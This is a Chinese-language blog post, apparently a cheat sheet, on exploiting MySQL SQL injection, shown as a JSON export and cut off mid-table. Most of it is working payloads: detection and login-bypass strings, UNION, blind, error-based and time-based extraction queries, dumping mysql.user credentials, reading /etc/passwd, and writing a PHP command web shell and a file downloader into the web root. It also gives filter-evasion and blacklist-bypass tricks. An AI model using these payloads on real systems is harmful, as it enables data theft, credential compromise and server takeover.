{"id":439,"date":"2016-01-06T13:23:45","date_gmt":"2016-01-06T05:23:45","guid":{"rendered":"http:\/\/www.huike007.cn\/?p=439"},"modified":"2016-01-06T13:23:45","modified_gmt":"2016-01-06T05:23:45","slug":"mysql%e6%b3%a8%e5%85%a5%e7%a7%91%e6%99%ae","status":"publish","type":"post","link":"http:\/\/www.huike007.cn\/?p=439","title":{"rendered":"MySql\u6ce8\u5165\u79d1\u666e"},"content":{"rendered":"<h1 class=\"entry-title ng-binding\"><\/h1>\n<section class=\"entry-content ng-binding\">\n<h3>\u9ed8\u8ba4\u5b58\u5728\u7684\u6570\u636e\u5e93\uff1a<\/h3>\n<table>\n<tbody>\n<tr>\n<td>mysql<\/td>\n<td>\u9700\u8981root\u6743\u9650\u8bfb\u53d6<\/td>\n<\/tr>\n<tr>\n<td>information_schema<\/td>\n<td>\u57285\u4ee5\u4e0a\u7684\u7248\u672c\u4e2d\u5b58\u5728<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>\u6d4b\u8bd5\u662f\u5426\u5b58\u5728\u6ce8\u5165\u65b9\u6cd5<\/h3>\n<p>\u5047\uff1a\u8868\u793a\u67e5\u8be2\u662f\u9519\u8bef\u7684 (MySQL \u62a5\u9519\/\u8fd4\u56de\u9875\u9762\u4e0e\u539f\u6765\u4e0d\u540c)<br \/>\n\u771f\uff1a\u8868\u793a\u67e5\u8be2\u662f\u6b63\u5e38\u7684 (\u8fd4\u56de\u9875\u9762\u4e0e\u539f\u6765\u76f8\u540c)<br \/>\n<!--more-->\u5171\u4e09\u79cd\u60c5\u51b5\uff1a<\/p>\n<table>\n<tbody>\n<tr>\n<th>\u5b57\u7b26\u4e32\u7c7b\u578b\u67e5\u8be2\u65f6\uff1a<\/th>\n<th>\u6570\u5b57\u7c7b\u578b\u67e5\u8be2\u65f6\uff1a<\/th>\n<th>\u767b\u9646\u65f6\uff1a<\/th>\n<\/tr>\n<tr>\n<td>\n<table>\n<tbody>\n<tr>\n<td>&#8216;<\/td>\n<td>\u5047<\/td>\n<\/tr>\n<tr>\n<td>&#8221;<\/td>\n<td>\u771f<\/td>\n<\/tr>\n<tr>\n<td>&#8220;<\/td>\n<td>\u5047<\/td>\n<\/tr>\n<tr>\n<td>&#8220;&#8221;<\/td>\n<td>\u771f<\/td>\n<\/tr>\n<tr>\n<td>\\<\/td>\n<td>\u5047<\/td>\n<\/tr>\n<tr>\n<td>\\\\<\/td>\n<td>\u771f<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<td>\n<table>\n<tbody>\n<tr>\n<td>AND 1<\/td>\n<td>\u771f<\/td>\n<\/tr>\n<tr>\n<td>AND 0<\/td>\n<td>\u5047<\/td>\n<\/tr>\n<tr>\n<td>AND true<\/td>\n<td>\u771f<\/td>\n<\/tr>\n<tr>\n<td>AND 
false<\/td>\n<td>\u5047<\/td>\n<\/tr>\n<tr>\n<td>1-false<\/td>\n<td>\u6709\u95ee\u9898\u65f6\u8fd4\u56de1\u7684\u7ed3\u679c<\/td>\n<\/tr>\n<tr>\n<td>1-true<\/td>\n<td>\u6709\u95ee\u9898\u65f6\u8fd4\u56de0\u7684\u7ed3\u679c<\/td>\n<\/tr>\n<tr>\n<td>2-1<\/td>\n<td>\u8fd4\u56de\u4e0e1\u76f8\u540c\u4ee3\u8868\u53ef\u80fd\u5b58\u5728\u95ee\u9898<\/td>\n<\/tr>\n<tr>\n<td>1*56<\/td>\n<td>\u8fd4\u56de\u4e0e56\u76f8\u540c\u4ee3\u8868\u53ef\u80fd\u5b58\u5728\u95ee\u9898<\/td>\n<\/tr>\n<tr>\n<td>1*56<\/td>\n<td>\u8fd4\u56de\u4e0e1\u76f8\u540c\u4ee3\u8868\u6ca1\u6709\u95ee\u9898<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<td>\n<table>\n<tbody>\n<tr>\n<td>&#8216; OR &#8216;1<\/td>\n<\/tr>\n<tr>\n<td>&#8216; OR 1 &#8212; &#8211;<\/td>\n<\/tr>\n<tr>\n<td>&#8221; OR &#8220;&#8221; = &#8220;<\/td>\n<\/tr>\n<tr>\n<td>&#8221; OR 1 = 1 &#8212; &#8211;<\/td>\n<\/tr>\n<tr>\n<td>&#8216;=&#8217;<\/td>\n<\/tr>\n<tr>\n<td>&#8216;LIKE&#8217;<\/td>\n<\/tr>\n<tr>\n<td>&#8216;=0&#8211;+<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50:<\/p>\n<pre class=\"highlight\">SELECT * FROM Users WHERE id = '1''';\nSELECT * FROM Users WHERE id = 3-2;\nSELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = '';\n<\/pre>\n<p>\u53ef\u4ee5\u4f7f\u7528\u5f88\u591a\u5355\u53cc\u5f15\u53f7\uff0c\u53ea\u8981\u662f\u6210\u5bf9\u51fa\u73b0\u3002<\/p>\n<pre class=\"highlight\">SELECT * FROM Articles WHERE id = '121'''''''''''''\n<\/pre>\n<p>\u5f15\u53f7\u540e\u7684\u8bed\u53e5\u4f1a\u7ee7\u7eed\u6267\u884c\u3002<\/p>\n<pre class=\"highlight\">SELECT '1'''''\"\" UNION SELECT '2' # 1 and 2\n<\/pre>\n<p>\u4e0b\u9762\u7684\u7b26\u53f7\u53ef\u4ee5\u7528\u6765\u6ce8\u91ca\u8bed\u53e5\uff1a<\/p>\n<table>\n<tbody>\n<tr>\n<td>#<\/td>\n<td>Hash \u8bed\u6cd5<\/td>\n<\/tr>\n<tr>\n<td>\/*<\/td>\n<td>C-style \u8bed\u6cd5<\/td>\n<\/tr>\n<tr>\n<td>&#8212; &#8211;<\/td>\n<td>SQL 
\u8bed\u6cd5<\/td>\n<\/tr>\n<tr>\n<td>;%00<\/td>\n<td>\u7a7a\u5b57\u8282<\/td>\n<\/tr>\n<tr>\n<td>`<\/td>\n<td>\u53cd\u5f15\u53f7<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password = '';\nSELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';\n<\/pre>\n<h3>\u6d4b\u8bd5\u6570\u636e\u5e93\u7248\u672c<\/h3>\n<pre class=\"highlight\">VERSION()\n@@VERSION\n@@GLOBAL.VERSION\n<\/pre>\n<p>\u5982\u679c\u7248\u672c\u4e3a5\u7684\u8bdd\uff0c\u4e0b\u9762\u4f8b\u5b50\u8fd4\u56de\u4e3a\u771f\uff1a<\/p>\n<pre class=\"highlight\">SELECT * FROM Users WHERE id = '1' AND MID(VERSION(),1,1) = '5';\n<\/pre>\n<p>windows\u5e73\u53f0\u4e0a\u7684mysql\u67e5\u8be2\u4e0elinux\u4e0a\u8fd4\u56de\u4e0d\u540c\uff0c\u5982\u679c\u662fwindows\u670d\u52a1\u5668\u8fd4\u56de\u7ed3\u679c\u4f1a\u5305\u542b -nt-log\u5b57\u7b26\u3002<\/p>\n<h3>\u6570\u636e\u5e93\u8ba4\u8bc1\u4fe1\u606f\uff1a<\/h3>\n<table>\n<tbody>\n<tr>\n<td>\u8868<\/td>\n<td>mysql.user<\/td>\n<\/tr>\n<tr>\n<td>\u5b57\u6bb5<\/td>\n<td>user, password<\/td>\n<\/tr>\n<tr>\n<td>\u5f53\u524d\u7528\u6237<\/td>\n<td>user(), current_user(), current_user, system_user(), session_user()<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT current_user;\nSELECT CONCAT_WS(0x3A, user, password) FROM mysql.user WHERE user = 'root'-- (Privileged)\n<\/pre>\n<h3>\u6570\u636e\u5e93\u540d\uff1a<\/h3>\n<table>\n<tbody>\n<tr>\n<td>\u8868<\/td>\n<td>information_schema.schemata, mysql.db<\/td>\n<\/tr>\n<tr>\n<td>\u5b57\u6bb5<\/td>\n<td>schema_name, db<\/td>\n<\/tr>\n<tr>\n<td>\u5f53\u524d\u6570\u636e\u5e93<\/td>\n<td>database(), schema()<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT database();\nSELECT schema_name FROM information_schema.schemata;\nSELECT DISTINCT(db) FROM mysql.db;-- 
(Privileged)\n<\/pre>\n<h3>\u670d\u52a1\u5668\u4e3b\u673a\u540d\uff1a<\/h3>\n<pre class=\"highlight\">@@HOSTNAME\n<\/pre>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT @@hostname;\n<\/pre>\n<h3>\u8868\u548c\u5b57\u6bb5<\/h3>\n<h4>\u68c0\u6d4b\u5b57\u6bb5\u6570<\/h4>\n<p>\u4e24\u79cd\u65b9\u5f0f\uff1a<\/p>\n<table>\n<tbody>\n<tr>\n<td>ORDER BY\u5224\u65ad<\/td>\n<td>ORDER BY n+1; \u8ba9n\u4e00\u76f4\u589e\u52a0\u76f4\u5230\u51fa\u73b0\u9519\u8bef\u9875\u9762\u3002 \u4f8b\u5b50: \u67e5\u8be2\u8bed\u53e5 SELECT username, password, permission FROM Users WHERE id = &#8216;1&#8217;; 1&#8242; ORDER BY 1&#8211;+ \u771f 1&#8242; ORDER BY 2&#8211;+ \u771f 1&#8242; ORDER BY 3&#8211;+ \u771f 1&#8242; ORDER BY 4&#8211;+ \u5047- \u67e5\u8be2\u53ea\u7528\u4e863\u4e2a\u5b57\u6bb5 -1&#8242; UNION SELECT 1,2,3&#8211;+ \u771f<\/td>\n<\/tr>\n<tr>\n<td>\u57fa\u4e8e\u9519\u8bef\u67e5\u8be2<\/td>\n<td>AND (SELECT * FROM SOME_EXISTING_TABLE) = 1 \u6ce8\u610f: \u8fd9\u79cd\u65b9\u5f0f\u9700\u8981\u4f60\u77e5\u9053\u6240\u8981\u67e5\u8be2\u7684\u8868\u540d\u3002 \u8fd9\u79cd\u62a5\u9519\u65b9\u5f0f\u8fd4\u56de\u8868\u7684\u5b57\u6bb5\u6570\uff0c\u800c\u4e0d\u662f\u9519\u8bef\u7684\u67e5\u8be2\u8bed\u53e5\u3002 \u4f8b\u5b50\uff1a \u67e5\u8be2\u8bed\u53e5 SELECT permission FROM Users WHERE id = 1; AND (SELECT * FROM Users) = 1 \u8fd4\u56deUsers\u7684\u5b57\u6bb5\u6570<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u67e5\u8be2\u8868\u540d<\/h4>\n<p>\u4e09\u79cd\u65b9\u5f0f\uff1a<\/p>\n<table>\n<tbody>\n<tr>\n<td>Union\u65b9\u5f0f<\/td>\n<td>UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;&#8211; MySQL 4\u7248\u672c\u65f6\u7528version=9\uff0cMySQL 5\u7248\u672c\u65f6\u7528version=10<\/td>\n<\/tr>\n<tr>\n<td>\u76f2\u6ce8<\/td>\n<td>AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables &gt; &#8216;A&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u62a5\u9519<\/td>\n<td>AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY 
CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));&#8211; \u57285.1.5\u7248\u672c\u4e2d\u6210\u529f\u3002<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u67e5\u8be2\u5217\u540d<\/h4>\n<table>\n<tbody>\n<tr>\n<td>Union\u65b9\u5f0f<\/td>\n<td>UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = &#8216;tablename&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u76f2\u6ce8<\/td>\n<td>AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns &gt; &#8216;A&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u62a5\u9519<\/td>\n<td>AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));&#8211; \u57285.1.5\u7248\u672c\u4e2d\u6210\u529f\u3002 AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)&#8211; MySQL 5.1\u7248\u672c\u4fee\u590d\u4e86<\/td>\n<\/tr>\n<tr>\n<td>\u5229\u7528PROCEDURE ANALYSE()<\/td>\n<td>\u8fd9\u4e2a\u9700\u8981web\u5c55\u793a\u9875\u9762\u6709\u4f60\u6240\u6ce8\u5165\u67e5\u8be2\u7684\u4e00\u4e2a\u5b57\u6bb5\u3002 \u4f8b\u5b50: \u67e5\u8be2\u8bed\u53e5 SELECT username, permission FROM Users WHERE id = 1; 1 PROCEDURE ANALYSE() \u83b7\u5f97\u7b2c\u4e00\u4e2a\u6bb5\u540d 1 LIMIT 1,1 PROCEDURE ANALYSE() \u83b7\u5f97\u7b2c\u4e8c\u4e2a\u6bb5\u540d 1 LIMIT 2,1 PROCEDURE ANALYSE() \u83b7\u5f97\u7b2c\u4e09\u4e2a\u6bb5\u540d<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u4e00\u6b21\u67e5\u8be2\u591a\u4e2a\u8868\u6216\u5217<\/h4>\n<pre class=\"highlight\">SELECT (@) FROM 
(SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema&amp;gt;=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] &amp;gt;',table_name,' &amp;gt; ',column_name))))x\n<\/pre>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT * FROM Users WHERE id = '-1' UNION SELECT 1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema&amp;gt;=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] &amp;gt;',table_name,' &amp;gt; ',column_name))))x), 4--+';\n<\/pre>\n<p>\u8f93\u51fa\u7ed3\u679c\uff1a<\/p>\n<pre class=\"highlight\"> [ information_schema ] &gt;CHARACTER_SETS &gt; CHARACTER_SET_NAME\n [ information_schema ] &gt;CHARACTER_SETS &gt; DEFAULT_COLLATE_NAME\n [ information_schema ] &gt;CHARACTER_SETS &gt; DESCRIPTION\n [ information_schema ] &gt;CHARACTER_SETS &gt; MAXLEN\n [ information_schema ] &gt;COLLATIONS &gt; COLLATION_NAME\n [ information_schema ] &gt;COLLATIONS &gt; CHARACTER_SET_NAME\n [ information_schema ] &gt;COLLATIONS &gt; ID\n [ information_schema ] &gt;COLLATIONS &gt; IS_DEFAULT\n [ information_schema ] &gt;COLLATIONS &gt; IS_COMPILED\n<\/pre>\n<p>\u5229\u7528\u4ee3\u7801\uff1a<\/p>\n<pre class=\"highlight\">SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns\n<\/pre>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT username FROM Users WHERE id = '-1' UNION SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns;\n<\/pre>\n<p>\u8f93\u51fa\u7ed3\u679c\uff1a<\/p>\n<pre class=\"highlight\">Table: talk_revisions\nColumn: revid\nTable: talk_revisions\nColumn: userid\nTable: talk_revisions\nColumn: user\nTable: 
talk_projects\nColumn: priority\n<\/pre>\n<h4>\u6839\u636e\u5217\u540d\u67e5\u8be2\u6240\u5728\u7684\u8868<\/h4>\n<table>\n<tbody>\n<tr>\n<td>SELECT table_name FROM information_schema.columns WHERE column_name = &#8216;username&#8217;;<\/td>\n<td>\u67e5\u8be2\u5b57\u6bb5\u4e3ausername\u7684\u8868<\/td>\n<\/tr>\n<tr>\n<td>SELECT table_name FROM information_schema.columns WHERE column_name LIKE &#8216;%user%&#8217;;<\/td>\n<td>\u67e5\u8be2\u5b57\u6bb5\u4e2d\u5305\u542buser\u7684\u8868<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u6839\u636e\u8868\u67e5\u8be2\u5305\u542b\u7684\u5b57\u6bb5<\/h4>\n<table>\n<tbody>\n<tr>\n<td>SELECT column_name FROM information_schema.columns WHERE table_name = &#8216;Users&#8217;;<\/td>\n<td>\u67e5\u8be2user\u8868\u4e2d\u7684\u5b57\u6bb5<\/td>\n<\/tr>\n<tr>\n<td>SELECT column_name FROM information_schema.columns WHERE table_name LIKE &#8216;%user%&#8217;;<\/td>\n<td>\u67e5\u8be2\u5305\u542buser\u5b57\u7b26\u4e32\u8868\u4e2d\u7684\u5b57\u6bb5<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u7ed5\u8fc7\u5f15\u53f7\u9650\u5236<\/h4>\n<table>\n<tbody>\n<tr>\n<td>SELECT * FROM Users WHERE username = 0x61646D696E<\/td>\n<td>Hex\u7f16\u7801<\/td>\n<\/tr>\n<tr>\n<td>SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)<\/td>\n<td>\u5229\u7528CHAR()\u51fd\u6570<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u7ed5\u8fc7\u5b57\u7b26\u4e32\u9ed1\u540d\u5355<\/h4>\n<table>\n<tbody>\n<tr>\n<td>SELECT &#8216;a&#8217; &#8216;d&#8217; &#8216;mi&#8217; &#8216;n&#8217;;<\/td>\n<\/tr>\n<tr>\n<td>SELECT CONCAT(&#8216;a&#8217;, &#8216;d&#8217;, &#8216;m&#8217;, &#8216;i&#8217;, &#8216;n&#8217;);<\/td>\n<\/tr>\n<tr>\n<td>SELECT CONCAT_WS(&#8221;, &#8216;a&#8217;, &#8216;d&#8217;, &#8216;m&#8217;, &#8216;i&#8217;, &#8216;n&#8217;);<\/td>\n<\/tr>\n<tr>\n<td>SELECT GROUP_CONCAT(&#8216;a&#8217;, &#8216;d&#8217;, &#8216;m&#8217;, &#8216;i&#8217;, 
&#8216;n&#8217;);<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f7f\u7528CONCAT()\u65f6\uff0c\u4efb\u4f55\u4e2a\u53c2\u6570\u4e3anull\uff0c\u5c06\u8fd4\u56denull\uff0c \u63a8\u8350\u4f7f\u7528CONCAT_WS() \u3002<br \/>\nCONCAT_WS() \u51fd\u6570\u7b2c\u4e00\u4e2a\u53c2\u6570\u8868\u793a\u7528\u54ea\u4e2a\u5b57\u7b26\u95f4\u9694\u6240\u67e5\u8be2\u7684\u7ed3\u679c\u3002<\/p>\n<h4>\u6761\u4ef6\u8bed\u53e5<\/h4>\n<table>\n<tbody>\n<tr>\n<td>CASE<\/td>\n<\/tr>\n<tr>\n<td>IF()<\/td>\n<\/tr>\n<tr>\n<td>IFNULL()<\/td>\n<\/tr>\n<tr>\n<td>NULLIF()<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT IF(1=1, true, false);\nSELECT CASE WHEN 1=1 THEN true ELSE false END;\n<\/pre>\n<h4>\u65f6\u95f4\u5ef6\u8fdf\u67e5\u8be2\uff1a<\/h4>\n<table>\n<tbody>\n<tr>\n<td>SLEEP()<\/td>\n<td>MySQL 5<\/td>\n<\/tr>\n<tr>\n<td>BENCHMARK()<\/td>\n<td>MySQL 4\/5<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '\n<\/pre>\n<h3>\u6743\u9650<\/h3>\n<h4>\u6587\u4ef6\u6743\u9650<\/h4>\n<p>\u4e0b\u9762\u7684\u8bed\u53e5\u53ef\u4ee5\u67e5\u8be2\u7528\u6237\u8bfb\u5199\u6587\u4ef6\u64cd\u4f5c\u6743\u9650\uff1a<\/p>\n<table>\n<tbody>\n<tr>\n<td>SELECT file_priv FROM mysql.user WHERE user = &#8216;username&#8217;;<\/td>\n<td>\u9700\u8981root\u7528\u6237\u6765\u6267\u884c<\/td>\n<td>MySQL 4\/5<\/td>\n<\/tr>\n<tr>\n<td>SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = &#8216;file&#8217; AND grantee like &#8216;%username%&#8217;;<\/td>\n<td>\u666e\u901a\u7528\u6237\u90fd\u53ef\u4ee5<\/td>\n<td>MySQL 5<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u8bfb\u53d6\u6587\u4ef6<\/h4>\n<p>\u5982\u679c\u7528\u6237\u6709\u6587\u4ef6\u64cd\u4f5c\u6743\u9650\u53ef\u4ee5\u8bfb\u53d6\u6587\u4ef6\uff1a<\/p>\n<pre class=\"highlight\">LOAD_FILE()\n<\/pre>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT 
LOAD_FILE('\/etc\/passwd');\nSELECT LOAD_FILE(0x2F6574632F706173737764);\n<\/pre>\n<ul>\n<li>\u6587\u4ef6\u5fc5\u987b\u5728\u670d\u52a1\u5668\u4e0a\u3002<\/li>\n<li>LOAD_FILE()\u51fd\u6570\u64cd\u4f5c\u6587\u4ef6\u7684\u5f53\u524d\u76ee\u5f55\u662f@@datadir \u3002<\/li>\n<li>MySQL\u7528\u6237\u5fc5\u987b\u62e5\u6709\u5bf9\u6b64\u6587\u4ef6\u8bfb\u53d6\u7684\u6743\u9650\u3002<\/li>\n<li>\u6587\u4ef6\u5927\u5c0f\u5fc5\u987b\u5c0f\u4e8e max_allowed_packet\u3002<\/li>\n<li>@@max_allowed_packet\u7684\u9ed8\u8ba4\u5927\u5c0f\u662f1047552 \u5b57\u8282.<\/li>\n<\/ul>\n<h4>\u5199\u6587\u4ef6<\/h4>\n<p>\u5982\u679c\u7528\u6237\u6709\u6587\u4ef6\u64cd\u4f5c\u6743\u9650\u53ef\u4ee5\u5199\u6587\u4ef6\u3002<\/p>\n<pre class=\"highlight\">INTO OUTFILE\/DUMPFILE\n<\/pre>\n<p>\u5199\u4e00\u4e2aphp\u7684shell\uff1a<\/p>\n<pre class=\"highlight\">SELECT '&lt;? system($_GET[\\'c\\']); ?&gt;' INTO OUTFILE '\/var\/www\/shell.php';\n<\/pre>\n<p>\u8bbf\u95ee\u5982\u4e0b\u94fe\u63a5\uff1a<br \/>\nhttp:\/\/localhost\/shell.php?c=cat%20\/etc\/passwd<br \/>\n\u5199\u4e00\u4e2a\u4e0b\u8f7d\u8005\uff1a<\/p>\n<pre class=\"highlight\">SELECT '&lt;? 
fwrite(fopen($_GET[f], \\'w\\'), file_get_contents($_GET[u])); ?&gt;' INTO OUTFILE '\/var\/www\/get.php'\n<\/pre>\n<p>\u8bbf\u95ee\u5982\u4e0b\u94fe\u63a5\uff1a<br \/>\nhttp:\/\/localhost\/get.php?f=shell.php&#038;u=http:\/\/localhost\/c99.txt<\/p>\n<ul>\n<li>INTO OUTFILE \u4e0d\u53ef\u4ee5\u8986\u76d6\u5df2\u5b58\u5728\u7684\u6587\u4ef6\u3002<\/li>\n<li>INTO OUTFILE \u5fc5\u987b\u662f\u6700\u540e\u4e00\u4e2a\u67e5\u8be2\u3002<\/li>\n<li>\u5f15\u53f7\u662f\u5fc5\u987b\u7684\uff0c\u56e0\u4e3a\u6ca1\u6709\u529e\u6cd5\u53ef\u4ee5\u7f16\u7801\u8def\u5f84\u540d\u3002<\/li>\n<\/ul>\n<h4>PDO\u5806\u67e5\u8be2\u65b9\u5f0f\u64cd\u4f5c\u6570\u636e\u5e93<\/h4>\n<p>PHP\u4f7f\u7528PDO_MYSQL\u6765\u8fde\u63a5\u6570\u636e\u5e93\uff0c\u4fbf\u53ef\u4ee5\u4f7f\u7528\u5806\u67e5\u8be2\uff0c\u5806\u67e5\u8be2\u53ef\u4ee5\u540c\u65f6\u6267\u884c\u591a\u4e2a\u8bed\u53e5\u3002<\/p>\n<pre class=\"highlight\">SELECT * FROM Users WHERE ID=1 AND 1=0; INSERT INTO Users(username,password,priv) VALUES ('BobbyTables', 'kl20da$$','admin');\n<\/pre>\n<h4>MySql\u7279\u6709\u7684\u5199\u6cd5<\/h4>\n<p>MySql\u4e2d\uff0c\/*! SQL \u8bed\u53e5 *\/ \u8fd9\u79cd\u683c\u5f0f\u91cc\u9762\u7684 SQL \u8bed\u53e5\u4f1a\u5f53\u6b63\u5e38\u7684\u8bed\u53e5\u4e00\u6837\u88ab\u89e3\u6790\u3002<br \/>\n\u5982\u679c\u5728!\u4e4b\u540e\u662f\u4e00\u4e32\u6570\u5b57(\u8fd9\u4e32\u6570\u5b57\u5c31\u662f mysql \u6570\u636e\u5e93\u7684\u7248\u672c\u53f7), \u5982\uff1a\/*! 
12345 SQL \u8bed\u53e5 *\/<br \/>\n\u5f53\u7248\u672c\u53f7\u5927\u4e8e\u7b49\u4e8e\u8be5\u6570\u5b57,SQL \u8bed\u53e5\u5219\u6267\u884c,\u5426\u5219\u5c31\u4e0d\u6267\u884c\u3002<\/p>\n<pre class=\"highlight\">SELECT 1\/*!41320UNION\/*!\/*!\/*!00000SELECT\/*!\/*!USER\/*!(\/*!\/*!\/*!*\/);\n<\/pre>\n<h3>\u6a21\u7cca\u548c\u6df7\u6dc6<\/h3>\n<h4>\u5141\u8bb8\u7684\u5b57\u7b26<\/h4>\n<table>\n<tbody>\n<tr>\n<td>09<\/td>\n<td>Horizontal Tab<\/td>\n<\/tr>\n<tr>\n<td>0A<\/td>\n<td>New Line<\/td>\n<\/tr>\n<tr>\n<td>0B<\/td>\n<td>Vertical Tab<\/td>\n<\/tr>\n<tr>\n<td>0C<\/td>\n<td>New Page<\/td>\n<\/tr>\n<tr>\n<td>0D<\/td>\n<td>Carriage Return<\/td>\n<\/tr>\n<tr>\n<td>A0<\/td>\n<td>Non-breaking Space<\/td>\n<\/tr>\n<tr>\n<td>20<\/td>\n<td>Space<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">'%0A%09UNION%0CSELECT%A0NULL%20%23\n<\/pre>\n<p>\u62ec\u53f7\u4e5f\u53ef\u4ee5\u7528\u6765\u7ed5\u8fc7\u8fc7\u6ee4\u7a7a\u683c\u7684\u60c5\u51b5\uff1a<\/p>\n<table>\n<tbody>\n<tr>\n<td>28<\/td>\n<td>(<\/td>\n<\/tr>\n<tr>\n<td>29<\/td>\n<td>)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">UNION(SELECT(column)FROM(table))\n<\/pre>\n<h4>AND\u6216OR\u540e\u9762\u53ef\u4ee5\u8ddf\u7684\u5b57\u7b26<\/h4>\n<table>\n<tbody>\n<tr>\n<td>20<\/td>\n<td>Space<\/td>\n<\/tr>\n<tr>\n<td>2B<\/td>\n<td>+<\/td>\n<\/tr>\n<tr>\n<td>2D<\/td>\n<td>&#8211;<\/td>\n<\/tr>\n<tr>\n<td>7E<\/td>\n<td>~<\/td>\n<\/tr>\n<tr>\n<td>21<\/td>\n<td>!<\/td>\n<\/tr>\n<tr>\n<td>40<\/td>\n<td>@<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT 1 FROM dual WHERE 1=1 
AND-+-+-+-+~~((1))\n<\/pre>\n<p>dual\u662f\u4e00\u4e2a\u865a\u62df\u8868\uff0c\u53ef\u4ee5\u7528\u6765\u505a\u6d4b\u8bd5\u3002<\/p>\n<h3>\u51e0\u4e2a\u9488\u5bf9\u9ed1\u540d\u5355\u7ed5\u8fc7\u7684\u4f8b\u5b50<\/h3>\n<h4>\u57fa\u4e8e\u5173\u952e\u5b57\u7684\u9ed1\u540d\u5355<\/h4>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and or<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or)\/i&#8217;,$id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 or 1=1 1 and 1=1<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 || 1=1 1 &amp;&amp; 